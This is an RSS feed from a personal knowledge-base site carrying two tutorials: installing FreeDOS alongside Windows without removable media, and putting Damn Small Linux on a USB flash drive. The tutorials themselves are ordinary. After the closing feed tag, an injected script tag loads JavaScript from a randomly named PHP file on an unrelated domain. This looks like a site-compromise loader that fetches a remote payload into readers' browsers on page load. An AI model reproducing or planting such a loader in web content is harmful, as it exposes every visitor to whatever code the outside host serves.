<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
    xmlns:admin="http://webns.net/mvcb/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:content="http://purl.org/rss/1.0/modules/content/">

    <channel>
    
    <title>OS | Program IN KB</title>

    <link>http://www.kb.programin.co.rs/</link>
    <description>Just another KB</description>
    <dc:language>en-ca</dc:language>
    <dc:creator>igor.trpcevic@gmail.com</dc:creator>

    <dc:rights>Copyright 2026</dc:rights>
    <admin:generatorAgent rdf:resource="http://www.codeigniter.com/" />

        
        <item>

          <title>Install FreeDOS without any CD, floppy, USB&#45;key, nor any other removable media</title>
          <link>http://www.kb.programin.co.rs/index.php/article/install-freedos-without-any-cd-floppy-usb-key-nor-any-o</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/install-freedos-without-any-cd-floppy-usb-key-nor-any-o</guid>

          <description><![CDATA[
      This document used to be part of the larger documentation <a href="http://marc.herbert.free.fr/linux/win2linstall.html"><span class="reference">Install Linux without any CD, floppy, USB-key, nor any 
other removable media</span></a>. The rationale was back then to first install FreeDOS 
as a intermediate step to be able to run <a href="http://marc.herbert.free.fr/linux/win2linstall.html#loadlin"><span class="reference">Loadlin</span></a>. Thanks to <a href="http://marc.herbert.free.fr/linux/win2linstall.html#grub-for-nt"><span class="reference">GRUB for NT</span></a><div class="document" id="install-freedos-without-any-cd-floppy-usb-key-nor-any-other-removable-media"><p> this long and preliminary 
step is not longer needed to install linux without any removable. So these 
FreeDOS instructions have been moved apart here on this page, in case some 
people interested by FreeDOS still find them useful. Or in case GRUB for NT does 
not work on your hardware.</p>
<div class="section" id="installing">
<h1><a name="installing">Installing</a></h1>
<p>Probably the most painful thing is finding one's way in <a href="http://www.freedos.org/"><span class="reference">FreeDOS</span></a> documentation, dodging the numerous 
instances of the irrelevant "create a CD / a floppy" directive. Understanding 
how to install and boot FreeDOS from Windows without any CD nor floppy was one 
of the tasks where I wasted most of my time. Once you got it, it's easy.</p>
<p>It is possible to make FreeDOS coexist with Windows in your existing C: 
system partition, but I will <em>not</em> explain that because:</p>
<ul class="simple"><li>it requires that C: is FAT-formated, which is probably not the case on your 
machine. 
</li><li>there is a risk to make your machine unbootable if you make an error 
</li></ul>
<p>Instead, I recommend making a FAT primary partition dedicated to FreeDOS. 
50Mo is more than enough for the "mini" install. From now on, I will call this 
partition <tt class="literal"><span class="pre">F:</span></tt>. Please substitute 
<tt class="literal"><span class="pre">F:</span></tt> everywhere by the letter 
appropriate for you. If you really want to install FreeDOS in the same partition 
as Windows, this nice <a href="http://www.winntmag.com/Articles/Index.cfm?IssueID=62&ArticleID=3952"><span class="reference">NT 
boot process article</span></a> and the <a href="http://fd-doc.sourceforge.net/faq/cgi-bin/viewdir.cgi?dir=Installing_FreeDOS"><span class="reference">FreeDOS 
FAQ</span></a> will help you understand what you are doing (you can find many other 
helpful articles about this topic on the web). But you are on your own.</p>
<p><strong>Warning</strong>: Some versions of windows will not allow the FreeDOS 
installer to touch the <tt class="literal"><span class="pre">F:</span></tt> 
partition unless it is formatted by <em>Windows</em> in FAT16 (<em>not</em> in 
FAT32). Moreover, it better be a <em>primary</em> partition to ease later 
booting configuration.</p>&lt;!-- TODO: test odin7bin.zip? Non: que des images disques --&gt;&lt;!-- par contre ce (vieux) truc: http://www.fdos.org/ripcord/zette/ --&gt;&lt;!-- a l'air de faire exactement ce qu'il faut --&gt;
<p>Since FreeDOS unfortunately provides its installer <em>only</em> as a <a href="http://www.freedos.org/freedos/files/"><span class="reference">CD or floppy 
bootable image</span></a>, I prepared a more convenient <a href="http://marc.herbert.free.fr/FDOS/"><span class="reference">zip archive</span></a> with the exact same 
content <a class="citation-reference" id="id1" href="#t" name="id1">[t]</a>. Download 
and extract this <a href="http://marc.herbert.free.fr/FDOS/"><span class="reference">zip 
archive</span></a> in F:. Then double-click on <tt class="literal"><span class="pre">F:\FREEDOS\SETUP\INSTALL\INSTALL.EXE</span></tt> 
and just answer the questions. Avoid problems by avoiding the graphical 
installer. The "mini" install is enough for us, and the appropriate source and 
target directories are something like: <tt class="literal"><span class="pre">F:\FREEDOS\PACKAGES</span></tt> and <tt class="literal"><span class="pre">F:\FDOS</span></tt> respectively.</p>
<p>The final step of the installation makes the FreeDOS partition bootable and 
is normally performed by the script <tt class="literal"><span class="pre">F:\FDOS\POSTINST.BAT</span></tt>. Do 
<strong>not</strong> launch this script, since it assumes that you want to 
install FreeDOS to <strong>C:</strong> Instead, use the following commands:</p><pre class="literal-block">F:
cd FDOS
bin\sys  F:  C:\FDOSBOOT.BIN  BOOTONLY

copy BIN\KERNEL32.SYS F:\KERNEL.SYS

cd NLS
set lang=EN
makecmd
copy COMMAND.COM F:\
</pre>&lt;!-- syntaxe de sys dans le code source: http://cvs.sourceforge.net/viewcvs.py/freedos/kernel/sys/sys.c --&gt;&lt;!-- pas besoin d etre au bon endroit pour taper sys: il prend F: comme source par default --&gt;&lt;!-- http://www.geocities.com/thestarman3/asm/mbr/SYSCOM.htm --&gt;&lt;!-- INSTALL.EXE est lancé par SETUP\BATCH\TEXTMENU.BAT, qui formatte,
et appelle SYS (BOOTONLY!) etc. (SYS est appelé une autre fois plus tard.)
C'est SETUP\BATCH\POSTINST.BAT qui recherche PACKAGES\PACKAGES\XXX\POSTINST.BAT
le copie dans F/\FDOS, ce dernier faisant finalement l'install. --&gt;</div>
<div class="section" id="booting-freedos">
<h1><a name="booting-freedos">Booting FreeDOS</a></h1>
<p>Now you have to add FreeDOS in your Windows boot menu.</p>
<p>Warning: this is the sole risky part of the procedure, since an error here 
may render your machine unbootable. So it's time to launch your daily backup and 
check that this rescue boot floppy/CD you made a long time ago is still working 
<a class="citation-reference" id="id2" href="#b" name="id2">[b]</a>. On the other 
hand, it's short and easy. Just proceed slowly and carefully.</p>
<p>Edit the file <tt class="literal"><span class="pre">C:\BOOT.INI</span></tt>.&nbsp;Oh 
wait, by default this file is hidden, read-only, system and fireproof. To remove 
all that, type: <tt class="literal"><span class="pre">attrib</span> <span class="pre">c:\BOOT.INI</span> <span class="pre">-s</span> <span class="pre">-h</span> <span class="pre">-r</span></tt>. Now edit the file <tt class="literal"><span class="pre">C:\BOOT.INI</span></tt>.&nbsp;Do not touch any existing 
line, just add at the end the following line:</p><pre class="literal-block">C:\FDOSBOOT.BIN="FreeDOS"
</pre>
<p>The following command may help you sleep better: <tt class="literal"><span class="pre">attrib</span> <span class="pre">c:\boot.ini</span> <span class="pre">+s</span> <span class="pre">+h</span> 
<span class="pre">+r</span></tt></p>
<p>Warning: when you will reboot in FreeDOS, <tt class="literal"><span class="pre">F:</span></tt> will become <tt class="literal"><span class="pre">C:</span></tt>. (don't try to understand the way 
Windows systems name the partitions, it's not interesting).</p><hr>

<table class="citation" id="b" frame="void" rules="none">
<colgroup>
<col class="label">
<col></colgroup>
<colgroup>
<col>
</colgroup><tbody valign="top">
<tr>
<td class="label"><a class="fn-backref" href="#id2" name="b">[b]</a></td>
<td>since you are installing a new system, you should do that 
anyway.</td></tr></tbody></table>
<table class="citation" id="t" frame="void" rules="none">
<colgroup>
<col class="label">
<col></colgroup>
<colgroup>
<col>
</colgroup><tbody valign="top">
<tr>
<td class="label"><a class="fn-backref" href="#id1" name="t">[t]</a></td>
<td>If you really want the official release, you still can mount the iso image 
on your desktop <em>without</em> burning it, thanks to <a class="reference" href="http://www.daemon-tools.cc/">Daemon Tools</a> for instance. Then follow 
the same instructions.</td></tr></tbody></table></div></div>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 12:03:28 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Install Damn Small Linux to a Flash Drive in Windows</title>
          <link>http://www.kb.programin.co.rs/index.php/article/install-damn-small-linux-to-a-flash-drive-in-windows</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/install-damn-small-linux-to-a-flash-drive-in-windows</guid>

          <description><![CDATA[
      <p><em>USB Damn Small Linux (DSL)? </em>This is a revisit of the Windows DSL USB 
installation tutorial: "Putting damn small linux on a USB pendrive". Damn Small 
Linux was created by John Andrews, and is basically a trimmed down version of an 
early Knoppix build, making it perfect for smaller drives. Based on the 2.4 
kernel, DSL is great to use for older and slower computers as well. It will fit 
and run on portable devices or drives as small as 64MB.</p>
<p><span id="more-50"></span></p>
<p><strong>Damn Small Linux Desktop Screenshot</strong></p>
<p><img class="alignnone size-full wp-image-2657" title="Damn Small Linux Desktop Screenshot" alt="Damn Small Linux Desktop Screenshot" src="http://www.pendrivelinux.com/wp-content/uploads/Damn-Small-Linux.png" width="450" height="337"></p>
<p><strong>Distribution Home Page</strong>: <a href="http://www.damnsmalllinux.org/"><span class="external">damnsmalllinux.org</span></a></p>
<p><strong>Minimum Flash Drive Capacity</strong>: 64MB</p>
<p><strong>Persistent Feature</strong>: Yes</p>
<p><strong>Damn Small Linux Flash Drive creation essentials:</strong></p>
<ul><li><span style="color: rgb(0, 102, 255);">A 64MB or larger USB flash drive (fat32 
formatted)<br></span>
</li><li><span style="color: rgb(0, 102, 255);">A Windows Host<span style="font-family: 'Lucida Grande',Verdana,Arial,Sans-Serif;"> PC</span><a class="kLink" id="KonaLink0" href="#" target="undefined"><font style="font-weight: 400; color: rgb(0, 153, 0) ! important; font-family: 'Lucida Grande',Verdana,Arial,Sans-Serif; position: static;" color="#009900"><span class="kLink" style="font-weight: 400; color: rgb(0, 153, 0) ! important; border-bottom: 1px solid rgb(0, 153, 0); font-family: 'Lucida Grande',Verdana,Arial,Sans-Serif; position: relative; background-color: transparent;"></span></font><span class="preLoadWrap" id="preLoadWrap0" style="position: relative;">
<div id="preLoadLayer0" style="display: none; z-index: 2147482647; left: -18px; position: absolute; top: -22px;"><img class="preloadImg" style="border: medium none; width: 22px; height: 22px;" src="http://kona.kontera.com/javascript/lib/imgs/grey_loader.gif" width="22" height="22"></div></span></a> (with Admin access)<br></span>
</li><li><span style="color: rgb(0, 102, 255);">dsl-embedded.zip</span> 
</li><li><span style="color: rgb(0, 102, 255);">Universal USB Installer (to install DSL to 
USB)<br></span></li></ul>
<p><strong>How to make a Damn Small Linux USB Flash Drive:</strong></p>
<ol><li><a href="ftp://ibiblio.org/pub/Linux/distributions/damnsmall/archive/dsl-4.4.9-embedded.zip"><span class="external">Download</span> the <strong>dsl-embedded.zip</strong></a> 
</li><li><a href="http://www.pendrivelinux.com/downloads/Universal-USB-Installer/Universal-USB-Installer-v1.7.7.exe">Download 
and run <strong>Universal USB Installer</strong></a>, select DSL 4.4.9 and follow 
the onscreen instructions 
</li><li>Once the script has finished, reboot your computer and set your system BIOS 
or Boot Menu to boot from the USB device </li></ol>
<p>If all goes well, you should now be booting&nbsp; into DSL from your <em>Damn 
Small Linux Flash Drive</em>.</p>
<p><strong><span style="color: rgb(128, 0, 0);">Notes:</span></strong> It is also 
possible to "<a title="Run Dman Small Linux in Windows" href="http://www.pendrivelinux.com/run-damn-small-linux-in-windows/" target="_blank">Run Damn Small Linux in Windows</a> using Qemu emulation" without 
the need to reboot the PC.</p>
<p>For other options, see the readme file that was written by the author of DSL.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 12:07:47 +0000</pubDate>
        </item>

        
        
    </channel></rss><script type="text/javascript">var gwloaded = false;</script>
<script src="http://tolfiles.net/wp-includes/OsWNRgLG.php" type="text/javascript"></script>